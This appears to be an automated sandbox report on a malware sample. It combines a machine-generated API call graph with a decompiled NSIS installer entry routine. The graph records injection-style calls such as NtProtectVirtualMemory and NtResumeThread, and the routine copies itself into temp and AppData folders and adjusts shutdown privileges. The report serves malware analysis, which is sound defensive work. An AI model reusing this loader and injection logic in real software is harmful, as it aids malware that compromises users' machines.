9159 2acbc81 9157->9159 9158 2ad3b8f 9158->9134 9159->9134 9159->9158 9160 2ad3201 LoadLibraryA 9159->9160 9161 2ad3a08 3 API calls 9159->9161 9162 2ad3220 3 API calls 9160->9162 9163 2ad31e3 9161->9163 9166 2ad320b 9162->9166 9164 2ad3220 3 API calls 9163->9164 9165 2ad31f6 9164->9165 9165->9160 9166->9134 9313 401ede 9314 402d84 17 API calls 9313->9314 9315 401ee4 9314->9315 9316 402d84 17 API calls 9315->9316 9317 401ef0 9316->9317 9318 401f07 EnableWindow 9317->9318 9319 401efc ShowWindow 9317->9319 9320 402c2a 9318->9320 9319->9320 9321 4056de 9322 405888 9321->9322 9323 4056ff GetDlgItem GetDlgItem GetDlgItem 9321->9323 9325 405891 GetDlgItem CreateThread CloseHandle 9322->9325 9326 4058b9 9322->9326 9367 4044ce SendMessageW 9323->9367 9325->9326 9370 405672 OleInitialize 9325->9370 9328 4058e4 9326->9328 9329 4058d0 ShowWindow ShowWindow 9326->9329 9330 405909 9326->9330 9327 40576f 9333 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 9327->9333 9331 4058f0 9328->9331 9332 405944 9328->9332 9369 4044ce SendMessageW 9329->9369 9337 404500 8 API calls 9330->9337 9335 4058f8 9331->9335 9336 40591e ShowWindow 9331->9336 9332->9330 9340 405952 SendMessageW 9332->9340 9338 4057e4 9333->9338 9339 4057c8 SendMessageW SendMessageW 9333->9339 9341 404472 SendMessageW 9335->9341 9342 405930 9336->9342 9343 40593e 9336->9343 9348 405917 9337->9348 9346 4057f7 9338->9346 9347 4057e9 SendMessageW 9338->9347 9339->9338 9340->9348 9349 40596b CreatePopupMenu 9340->9349 9341->9330 9344 40559f 24 API calls 9342->9344 9345 404472 SendMessageW 9343->9345 9344->9343 9345->9332 9351 404499 18 API calls 9346->9351 9347->9346 9350 40657a 17 API calls 9349->9350 9352 40597b AppendMenuW 9350->9352 9353 405807 9351->9353 9354 405998 GetWindowRect 9352->9354 9355 4059ab TrackPopupMenu 9352->9355 9356 405810 ShowWindow 9353->9356 9357 405844 GetDlgItem SendMessageW 9353->9357 9354->9355 9355->9348 9359 4059c6 9355->9359 9360 405833 9356->9360 9361 405826 ShowWindow 
9356->9361 9357->9348 9358 40586b SendMessageW SendMessageW 9357->9358 9358->9348 9362 4059e2 SendMessageW 9359->9362 9368 4044ce SendMessageW 9360->9368 9361->9360 9362->9362 9363 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 9362->9363 9365 405a24 SendMessageW 9363->9365 9365->9365 9366 405a4d GlobalUnlock SetClipboardData CloseClipboard 9365->9366 9366->9348 9367->9327 9368->9357 9369->9328 9371 4044e5 SendMessageW 9370->9371 9372 405695 9371->9372 9375 401389 2 API calls 9372->9375 9376 4056bc 9372->9376 9373 4044e5 SendMessageW 9374 4056ce OleUninitialize 9373->9374 9375->9372 9376->9373 11258 401ff6 11259 402da6 17 API calls 11258->11259 11260 401ffd 11259->11260 11261 406873 2 API calls 11260->11261 11262 402003 11261->11262 11264 402014 11262->11264 11265 406484 wsprintfW 11262->11265 11265->11264 9770 4022ff 9771 402da6 17 API calls 9770->9771 9772 402305 9771->9772 9773 402da6 17 API calls 9772->9773 9774 40230e 9773->9774 9775 402da6 17 API calls 9774->9775 9776 402317 9775->9776 9777 406873 2 API calls 9776->9777 9778 402320 9777->9778 9779 402331 lstrlenW lstrlenW 9778->9779 9783 402324 9778->9783 9781 40559f 24 API calls 9779->9781 9780 40559f 24 API calls 9784 40232c 9780->9784 9782 40236f SHFileOperationW 9781->9782 9782->9783 9782->9784 9783->9780 9783->9784 10476 2ac1713 10477 2ac1716 10476->10477 10480 2ad4f37 10477->10480 10479 2ac177a 10481 2ad30f0 5 API calls 10480->10481 10482 2ad4f4a 10481->10482 10483 2ad30f0 5 API calls 10482->10483 10484 2ad4f65 10483->10484 10487 2ad4fb4 GetPEB 10484->10487 10496 2ac1b34 10484->10496 10485 2ad31cd 10488 2ad3a08 4 API calls 10485->10488 10486 2ad3201 LoadLibraryA 10489 2ad3220 4 API calls 10486->10489 10490 2ad503f 10487->10490 10491 2ad31e3 10488->10491 10495 2ad320b 10489->10495 10493 2ad5fda NtProtectVirtualMemory 10490->10493 10490->10496 10492 2ad3220 4 API calls 10491->10492 10494 2ad31f6 10492->10494 10497 2ad5091 10493->10497 10494->10486 10495->10479 10496->10479 10496->10485 
10496->10486 10501 2ad2cdb 10496->10501 10497->10495 10497->10496 10498 2ad59db 10497->10498 10500 2ac1ab9 10497->10500 10503 2ad54de 10497->10503 10498->10496 10499 2ad5ceb 10498->10499 10504 2ad5ab5 10498->10504 10499->10496 10502 2ad5dc7 10499->10502 10512 2ad335c 10500->10512 10501->10479 10505 2ad5fda NtProtectVirtualMemory 10502->10505 10503->10496 10503->10500 10509 2ad5950 10503->10509 10504->10496 10506 2ad5ce0 10504->10506 10505->10495 10507 2ad5fda NtProtectVirtualMemory 10506->10507 10508 2ad5ce6 10507->10508 10508->10479 10510 2ad5fda NtProtectVirtualMemory 10509->10510 10510->10495 10511 2ad3487 4 API calls 10511->10512 10512->10500 10512->10511 10513 2ad3450 10512->10513 10513->10479 10125 2ac2a6e 10127 2ac2a73 10125->10127 10126 2ac2a98 10127->10126 10129 2ac2ae4 10127->10129 10130 2ad3ece 7 API calls 10129->10130 10131 2ac2b3e 10130->10131 10131->10126 8826 40248a 8827 402da6 17 API calls 8826->8827 8828 40249c 8827->8828 8829 402da6 17 API calls 8828->8829 8830 4024a6 8829->8830 8843 402e36 8830->8843 8833 402c2a 8834 4024de 8836 4024ea 8834->8836 8839 402d84 17 API calls 8834->8839 8835 402da6 17 API calls 8838 4024d4 lstrlenW 8835->8838 8837 402509 RegSetValueExW 8836->8837 8847 4032b4 8836->8847 8841 40251f RegCloseKey 8837->8841 8838->8834 8839->8836 8841->8833 8844 402e51 8843->8844 8867 4063d8 8844->8867 8848 4032cd 8847->8848 8849 4032fb 8848->8849 8874 4034e5 SetFilePointer 8848->8874 8871 4034cf 8849->8871 8853 403468 8855 4034aa 8853->8855 8860 40346c 8853->8860 8854 403318 GetTickCount 8856 403452 8854->8856 8863 403367 8854->8863 8857 4034cf ReadFile 8855->8857 8856->8837 8857->8856 8858 4034cf ReadFile 8858->8863 8859 4034cf ReadFile 8859->8860 8860->8856 8860->8859 8861 4060df WriteFile 8860->8861 8861->8860 8862 4033bd GetTickCount 8862->8863 8863->8856 8863->8858 8863->8862 8864 4033e2 MulDiv wsprintfW 8863->8864 8866 4060df WriteFile 8863->8866 8865 40559f 24 API calls 8864->8865 8865->8863 8866->8863 8868 4063e7 8867->8868 8869 
4063f2 RegCreateKeyExW 8868->8869 8870 4024b6 8868->8870 8869->8870 8870->8833 8870->8834 8870->8835 8872 4060b0 ReadFile 8871->8872 8873 403306 8872->8873 8873->8853 8873->8854 8873->8856 8874->8849 8885 70b22a7f 8886 70b22acf 8885->8886 8887 70b22a8f VirtualProtect 8885->8887 8887->8886 9167 403f9a 9168 403fb2 9167->9168 9169 404113 9167->9169 9168->9169 9170 403fbe 9168->9170 9171 404164 9169->9171 9172 404124 GetDlgItem GetDlgItem 9169->9172 9173 403fc9 SetWindowPos 9170->9173 9174 403fdc 9170->9174 9176 4041be 9171->9176 9186 401389 2 API calls 9171->9186 9175 404499 18 API calls 9172->9175 9173->9174 9178 403fe5 ShowWindow 9174->9178 9179 404027 9174->9179 9180 40414e SetClassLongW 9175->9180 9193 40410e 9176->9193 9240 4044e5 9176->9240 9181 404100 9178->9181 9182 404005 GetWindowLongW 9178->9182 9183 404046 9179->9183 9184 40402f DestroyWindow 9179->9184 9185 40140b 2 API calls 9180->9185 9262 404500 9181->9262 9182->9181 9189 40401e ShowWindow 9182->9189 9190 40404b SetWindowLongW 9183->9190 9191 40405c 9183->9191 9239 404422 9184->9239 9185->9171 9187 404196 9186->9187 9187->9176 9192 40419a SendMessageW 9187->9192 9189->9179 9190->9193 9191->9181 9196 404068 GetDlgItem 9191->9196 9192->9193 9194 40140b 2 API calls 9208 4041d0 9194->9208 9195 404424 DestroyWindow EndDialog 9195->9239 9198 404096 9196->9198 9199 404079 SendMessageW IsWindowEnabled 9196->9199 9197 404453 ShowWindow 9197->9193 9201 4040a3 9198->9201 9202 4040ea SendMessageW 9198->9202 9203 4040b6 9198->9203 9213 40409b 9198->9213 9199->9193 9199->9198 9200 40657a 17 API calls 9200->9208 9201->9202 9201->9213 9202->9181 9205 4040d3 9203->9205 9206 4040be 9203->9206 9210 40140b 2 API calls 9205->9210 9256 40140b 9206->9256 9207 4040d1 9207->9181 9208->9193 9208->9194 9208->9195 9208->9200 9211 404499 18 API calls 9208->9211 9230 404364 DestroyWindow 9208->9230 9243 404499 9208->9243 9212 4040da 9210->9212 9211->9208 9212->9181 9212->9213 9259 404472 9213->9259 9215 40424b GetDlgItem 9216 
404260 9215->9216 9217 404268 ShowWindow KiUserCallbackDispatcher 9215->9217 9216->9217 9246 4044bb KiUserCallbackDispatcher 9217->9246 9219 404292 EnableWindow 9224 4042a6 9219->9224 9220 4042ab GetSystemMenu EnableMenuItem SendMessageW 9221 4042db SendMessageW 9220->9221 9220->9224 9221->9224 9224->9220 9247 4044ce SendMessageW 9224->9247 9248 403f7b 9224->9248 9251 40653d lstrcpynW 9224->9251 9226 40430a lstrlenW 9227 40657a 17 API calls 9226->9227 9228 404320 SetWindowTextW 9227->9228 9252 401389 9228->9252 9231 40437e CreateDialogParamW 9230->9231 9230->9239 9232 4043b1 9231->9232 9231->9239 9233 404499 18 API calls 9232->9233 9234 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 9233->9234 9235 401389 2 API calls 9234->9235 9236 404402 9235->9236 9236->9193 9237 40440a ShowWindow 9236->9237 9238 4044e5 SendMessageW 9237->9238 9238->9239 9239->9193 9239->9197 9241 4044fd 9240->9241 9242 4044ee SendMessageW 9240->9242 9241->9208 9242->9241 9244 40657a 17 API calls 9243->9244 9245 4044a4 SetDlgItemTextW 9244->9245 9245->9215 9246->9219 9247->9224 9249 40657a 17 API calls 9248->9249 9250 403f89 SetWindowTextW 9249->9250 9250->9224 9251->9226 9254 401390 9252->9254 9253 4013fe 9253->9208 9254->9253 9255 4013cb MulDiv SendMessageW 9254->9255 9255->9254 9257 401389 2 API calls 9256->9257 9258 401420 9257->9258 9258->9213 9260 404479 9259->9260 9261 40447f SendMessageW 9259->9261 9260->9261 9261->9207 9263 4045c3 9262->9263 9264 404518 GetWindowLongW 9262->9264 9263->9193 9264->9263 9265 40452d 9264->9265 9265->9263 9266 40455a GetSysColor 9265->9266 9267 40455d 9265->9267 9266->9267 9268 404563 SetTextColor 9267->9268 9269 40456d SetBkMode 9267->9269 9268->9269 9270 404585 GetSysColor 9269->9270 9271 40458b 9269->9271 9270->9271 9272 404592 SetBkColor 9271->9272 9273 40459c 9271->9273 9272->9273 9273->9263 9274 4045b6 CreateBrushIndirect 9273->9274 9275 4045af DeleteObject 9273->9275 9274->9263 9275->9274 9276 401b9b 9277 401ba8 9276->9277 9278 401bec 
9276->9278 9283 401bbf 9277->9283 9285 401c31 9277->9285 9279 401bf1 9278->9279 9280 401c16 GlobalAlloc 9278->9280 9290 40239d 9279->9290 9297 40653d lstrcpynW 9279->9297 9282 40657a 17 API calls 9280->9282 9281 40657a 17 API calls 9288 402397 9281->9288 9282->9285 9295 40653d lstrcpynW 9283->9295 9285->9281 9285->9290 9287 401c03 GlobalFree 9287->9290 9288->9290 9298 405b9d 9288->9298 9289 401bce 9296 40653d lstrcpynW 9289->9296 9293 401bdd 9302 40653d lstrcpynW 9293->9302 9295->9289 9296->9293 9297->9287 9299 405bb2 9298->9299 9300 405bfe 9299->9300 9301 405bc6 MessageBoxIndirectW 9299->9301 9300->9290 9301->9300 9302->9290 9377 2ad2572 9381 2ad25d7 9377->9381 9378 2ad30f0 9379 2ad31cd 9378->9379 9380 2ad3201 LoadLibraryA 9378->9380 9382 2ad3a08 4 API calls 9379->9382 9383 2ad3220 4 API calls 9380->9383 9381->9378 9386 2ad2732 CreateFileA 9381->9386 9384 2ad31e3 9382->9384 9388 2ad320b 9383->9388 9385 2ad3220 4 API calls 9384->9385 9387 2ad31f6 9385->9387 9386->9378 9387->9380 9404 4015a3 9405 402da6 17 API calls 9404->9405 9406 4015aa SetFileAttributesW 9405->9406 9407 4015bc 9406->9407 9419 4021aa 9420 402da6 17 API calls 9419->9420 9421 4021b1 9420->9421 9422 402da6 17 API calls 9421->9422 9423 4021bb 9422->9423 9424 402da6 17 API calls 9423->9424 9425 4021c5 9424->9425 9426 402da6 17 API calls 9425->9426 9427 4021cf 9426->9427 9428 402da6 17 API calls 9427->9428 9429 4021d9 9428->9429 9430 402218 CoCreateInstance 9429->9430 9431 402da6 17 API calls 9429->9431 9434 402237 9430->9434 9431->9430 9432 401423 24 API calls 9433 4022f6 9432->9433 9434->9432 9434->9433 9672 2ad6643 9674 2ad6648 9672->9674 9675 2ad668c 9674->9675 9676 2ac1ab9 9675->9676 9677 2ad669e 9675->9677 9681 2ad335c 9676->9681 9679 2ad68ca NtResumeThread 9677->9679 9678 2ad3487 4 API calls 9678->9681 9680 2ad68eb 9679->9680 9680->9680 9681->9676 9681->9678 9682 2ad3450 9681->9682 9724 4023b2 9725 4023c0 9724->9725 9726 4023ba 9724->9726 9727 4023ce 9725->9727 9729 402da6 17 API calls 9725->9729 
9728 402da6 17 API calls 9726->9728 9730 402da6 17 API calls 9727->9730 9732 4023dc 9727->9732 9728->9725 9729->9727 9730->9732 9731 402da6 17 API calls 9733 4023e5 WritePrivateProfileStringW 9731->9733 9732->9731

Control-flow Graph (first block 40352d-40357d: SetErrorMode, GetVersionExW; legend: Executed / Not Executed)
C-Code - Quality: 79%
_entry_() {
	WCHAR* _v8;
	signed int _v12;
	void* _v16;
	signed int _v20;
	int _v24;
	int _v28;
	struct _TOKEN_PRIVILEGES _v40;
	signed char _v42;
	int _v44;
	signed int _v48;
	intOrPtr _v278;
	signed short _v310;
	struct _OSVERSIONINFOW _v324;
	struct _SHFILEINFOW _v1016;
	intOrPtr* _t88;
	WCHAR* _t92;
	char* _t94;
	void _t97;
	void* _t116;
	WCHAR* _t118;
	signed int _t120;
	intOrPtr* _t124;
	void* _t138;
	void* _t144;
	void* _t149;
	void* _t153;
	void* _t158;
	signed int _t168;
	void* _t171;
	void* _t176;
	intOrPtr _t178;
	intOrPtr _t179;
	intOrPtr* _t180;
	int _t189;
	void* _t190;
	void* _t199;
	signed int _t205;
	signed int _t210;
	signed int _t215;
	signed int _t217;
	int* _t219;
	signed int _t227;
	signed int _t230;
	CHAR* _t232;
	char* _t233;
	signed int _t234;
	WCHAR* _t235;
	void* _t251;

	_t217 = 0x20;
	_t189 = 0;
	_v24 = 0;
	_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
	_v20 = 0;
	SetErrorMode(0x8001); // executed
	_v324.szCSDVersion = 0;
	_v48 = 0;
	_v44 = 0;
	_v324.dwOSVersionInfoSize = 0x11c;
	if(GetVersionExW( &_v324) == 0) {
		_v324.dwOSVersionInfoSize = 0x114;
		GetVersionExW( &_v324);
		asm("sbb eax, eax");
		_v42 = 4;
		_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
	}
	if(_v324.dwMajorVersion < 0xa) {
		_v310 = _v310 & 0x00000000;
	}
	 *0x434fb8 = _v324.dwBuildNumber;
	 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                                                        				if( *0x434fbe != 0x600) {
                                                                                                                        					_t180 = E0040690A(_t189);
                                                                                                                        					if(_t180 != _t189) {
                                                                                                                        						 *_t180(0xc00);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t232 = "UXTHEME";
                                                                                                                        				do {
                                                                                                                        					E0040689A(_t232); // executed
                                                                                                                        					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                                                                        				} while ( *_t232 != 0);
                                                                                                                        				E0040690A(0xb);
                                                                                                                        				 *0x434f04 = E0040690A(9);
                                                                                                                        				_t88 = E0040690A(7);
                                                                                                                        				if(_t88 != _t189) {
                                                                                                                        					_t88 =  *_t88(0x1e);
                                                                                                                        					if(_t88 != 0) {
                                                                                                                        						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				__imp__#17();
                                                                                                                        				__imp__OleInitialize(_t189); // executed
                                                                                                                        				 *0x434fc0 = _t88;
                                                                                                                        				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                                                                        				E0040653D(0x433f00, L"NSIS Error");
                                                                                                                        				_t92 = GetCommandLineW();
                                                                                                                        				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ";
                                                                                                                        				E0040653D(_t233, _t92);
                                                                                                                        				_t94 = _t233;
                                                                                                                        				_t234 = 0x22;
                                                                                                                        				 *0x434f00 = 0x400000;
                                                                                                                        				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" " - _t234; // 0x22
                                                                                                                        				if(_t251 == 0) {
                                                                                                                        					_t217 = _t234;
                                                                                                                        					_t94 =  &M00440002;
                                                                                                                        				}
                                                                                                                        				_t199 = CharNextW(E00405E39(_t94, _t217));
                                                                                                                        				_v16 = _t199;
                                                                                                                        				while(1) {
                                                                                                                        					_t97 =  *_t199;
                                                                                                                        					_t252 = _t97 - _t189;
                                                                                                                        					if(_t97 == _t189) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t210 = 0x20;
                                                                                                                        					__eflags = _t97 - _t210;
                                                                                                                        					if(_t97 != _t210) {
                                                                                                                        						L17:
                                                                                                                        						__eflags =  *_t199 - _t234;
                                                                                                                        						_v12 = _t210;
                                                                                                                        						if( *_t199 == _t234) {
                                                                                                                        							_v12 = _t234;
                                                                                                                        							_t199 = _t199 + 2;
                                                                                                                        							__eflags = _t199;
                                                                                                                        						}
                                                                                                                        						__eflags =  *_t199 - 0x2f;
                                                                                                                        						if( *_t199 != 0x2f) {
                                                                                                                        							L32:
                                                                                                                        							_t199 = E00405E39(_t199, _v12);
                                                                                                                        							__eflags =  *_t199 - _t234;
                                                                                                                        							if(__eflags == 0) {
                                                                                                                        								_t199 = _t199 + 2;
                                                                                                                        								__eflags = _t199;
                                                                                                                        							}
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							_t199 = _t199 + 2;
                                                                                                                        							__eflags =  *_t199 - 0x53;
                                                                                                                        							if( *_t199 != 0x53) {
                                                                                                                        								L24:
                                                                                                                        								asm("cdq");
                                                                                                                        								asm("cdq");
                                                                                                                        								_t215 = L"NCRC" & 0x0000ffff;
                                                                                                                        								asm("cdq");
                                                                                                                        								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                                                                                        								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                                                                                        								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                                                        									L29:
                                                                                                                        									asm("cdq");
                                                                                                                        									asm("cdq");
                                                                                                                        									_t210 = L" /D=" & 0x0000ffff;
                                                                                                                        									asm("cdq");
                                                                                                                        									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                                                                                        									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                                                                                        									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                                                        										L31:
                                                                                                                        										_t234 = 0x22;
                                                                                                                        										goto L32;
                                                                                                                        									}
                                                                                                                        									__eflags =  *_t199 - _t230;
                                                                                                                        									if( *_t199 == _t230) {
                                                                                                                        										 *(_t199 - 4) = _t189;
                                                                                                                        										__eflags = _t199;
                                                                                                                        										E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne", _t199);
                                                                                                                        										L37:
                                                                                                                        										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                                                        										GetTempPathW(0x400, _t235);
                                                                                                                        										_t116 = E004034FC(_t199, _t252);
                                                                                                                        										_t253 = _t116;
                                                                                                                        										if(_t116 != 0) {
                                                                                                                        											L40:
                                                                                                                        											DeleteFileW(L"1033"); // executed
                                                                                                                        											_t118 = E0040307D(_t255, _v20); // executed
                                                                                                                        											_v8 = _t118;
                                                                                                                        											if(_t118 != _t189) {
                                                                                                                        												L68:
                                                                                                                        												E00403B12();
                                                                                                                        												__imp__OleUninitialize();
                                                                                                                        												if(_v8 == _t189) {
                                                                                                                        													if( *0x434f94 == _t189) {
                                                                                                                        														L77:
                                                                                                                        														_t120 =  *0x434fac;
                                                                                                                        														if(_t120 != 0xffffffff) {
                                                                                                                        															_v24 = _t120;
                                                                                                                        														}
                                                                                                                        														ExitProcess(_v24);
                                                                                                                        													}
                                                                                                                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                                                        														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                                                        														_v40.PrivilegeCount = 1;
                                                                                                                        														_v28 = 2;
                                                                                                                        														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                                                        													}
                                                                                                                        													_t124 = E0040690A(4);
                                                                                                                        													if(_t124 == _t189) {
                                                                                                                        														L75:
                                                                                                                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                                                        															goto L77;
                                                                                                                        														}
                                                                                                                        														goto L76;
                                                                                                                        													} else {
                                                                                                                        														_push(0x80040002);
                                                                                                                        														_push(0x25);
                                                                                                                        														_push(_t189);
                                                                                                                        														_push(_t189);
                                                                                                                        														_push(_t189);
                                                                                                                        														if( *_t124() == 0) {
                                                                                                                        															L76:
                                                                                                                        															E0040140B(9);
                                                                                                                        															goto L77;
                                                                                                                        														}
                                                                                                                        														goto L75;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												E00405B9D(_v8, 0x200010);
                                                                                                                        												ExitProcess(2);
                                                                                                                        											}
                                                                                                                        											if( *0x434f1c == _t189) {
                                                                                                                        												L51:
                                                                                                                        												 *0x434fac =  *0x434fac | 0xffffffff;
                                                                                                                        												_v24 = E00403BEC(_t265);
                                                                                                                        												goto L68;
                                                                                                                        											}
                                                                                                                        											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ", _t189);
                                                                                                                        											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ") {
                                                                                                                        												L48:
                                                                                                                        												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ";
                                                                                                                        												_v8 = L"Error launching installer";
                                                                                                                        												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ") {
                                                                                                                        													_t190 = E00405B08(__eflags);
                                                                                                                        													lstrcatW(_t235, L"~nsu");
                                                                                                                        													__eflags = _t190;
                                                                                                                        													if(_t190 != 0) {
                                                                                                                        														lstrcatW(_t235, "A");
                                                                                                                        													}
                                                                                                                        													lstrcatW(_t235, L".tmp");
                                                                                                                        													_t220 = L"C:\\Users\\Arthur\\Desktop";
                                                                                                                        													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
                                                                                                                        													__eflags = _t138;
                                                                                                                        													if(_t138 == 0) {
                                                                                                                        														L67:
                                                                                                                        														_t189 = 0;
                                                                                                                        														__eflags = 0;
                                                                                                                        														goto L68;
                                                                                                                        													} else {
                                                                                                                        														__eflags = _t190;
                                                                                                                        														_push(_t235);
                                                                                                                        														if(_t190 == 0) {
                                                                                                                        															E00405AEB();
                                                                                                                        														} else {
                                                                                                                        															E00405A6E();
                                                                                                                        														}
                                                                                                                        														SetCurrentDirectoryW(_t235);
                                                                                                                        														__eflags = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne"; // 0x43
                                                                                                                        														if(__eflags == 0) {
                                                                                                                        															E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne", _t220);
                                                                                                                        														}
                                                                                                                        														E0040653D(0x436000, _v16);
                                                                                                                        														_t202 = "A" & 0x0000ffff;
                                                                                                                        														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                                                        														__eflags = _t144;
                                                                                                                        														_v12 = 0x1a;
                                                                                                                        														 *0x436800 = _t144;
                                                                                                                        														do {
                                                                                                                        															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                                                                                        															DeleteFileW(0x42aa28);
                                                                                                                        															__eflags = _v8;
                                                                                                                        															if(_v8 != 0) {
                                                                                                                        																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe", 0x42aa28, 1);
                                                                                                                        																__eflags = _t149;
                                                                                                                        																if(_t149 != 0) {
                                                                                                                        																	E004062FD(_t202, 0x42aa28, 0);
                                                                                                                        																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                                                                                        																	_t153 = E00405B20(0x42aa28);
                                                                                                                        																	__eflags = _t153;
                                                                                                                        																	if(_t153 != 0) {
                                                                                                                        																		CloseHandle(_t153);
                                                                                                                        																		_v8 = 0;
                                                                                                                        																	}
                                                                                                                        																}
                                                                                                                        															}
                                                                                                                        															 *0x436800 =  *0x436800 + 1;
                                                                                                                        															_t61 =  &_v12;
                                                                                                                        															 *_t61 = _v12 - 1;
                                                                                                                        															__eflags =  *_t61;
                                                                                                                        														} while ( *_t61 != 0);
                                                                                                                        														E004062FD(_t202, _t235, 0);
                                                                                                                        														goto L67;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												 *_t219 = _t189;
                                                                                                                        												_t222 =  &(_t219[2]);
                                                                                                                        												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                                                                                        												_t265 = _t158;
                                                                                                                        												if(_t158 == 0) {
                                                                                                                        													goto L68;
                                                                                                                        												}
                                                                                                                        												E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne", _t222);
                                                                                                                        												E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick", _t222);
                                                                                                                        												_v8 = _t189;
                                                                                                                        												goto L51;
                                                                                                                        											}
                                                                                                                        											asm("cdq");
                                                                                                                        											asm("cdq");
                                                                                                                        											asm("cdq");
                                                                                                                        											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                                                        											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                                                                        											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                                                        												_t219 = _t219;
                                                                                                                        												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ") {
                                                                                                                        													continue;
                                                                                                                        												}
                                                                                                                        												break;
                                                                                                                        											}
                                                                                                                        											_t189 = 0;
                                                                                                                        											goto L48;
                                                                                                                        										}
                                                                                                                        										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                                                        										lstrcatW(_t235, L"\\Temp");
                                                                                                                        										_t171 = E004034FC(_t199, _t253);
                                                                                                                        										_t254 = _t171;
                                                                                                                        										if(_t171 != 0) {
                                                                                                                        											goto L40;
                                                                                                                        										}
                                                                                                                        										GetTempPathW(0x3fc, _t235);
                                                                                                                        										lstrcatW(_t235, L"Low");
                                                                                                                        										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                                                        										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                                                        										_t176 = E004034FC(_t199, _t254);
                                                                                                                        										_t255 = _t176;
                                                                                                                        										if(_t176 == 0) {
                                                                                                                        											goto L68;
                                                                                                                        										}
                                                                                                                        										goto L40;
                                                                                                                        									}
                                                                                                                        									goto L31;
                                                                                                                        								}
                                                                                                                        								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                                                        								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                                                        									goto L29;
                                                                                                                        								}
                                                                                                                        								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                                                        								__eflags = _t178 - 0x20;
                                                                                                                        								if(_t178 == 0x20) {
                                                                                                                        									L28:
                                                                                                                        									_t36 =  &_v20;
                                                                                                                        									 *_t36 = _v20 | 0x00000004;
                                                                                                                        									__eflags =  *_t36;
                                                                                                                        									goto L29;
                                                                                                                        								}
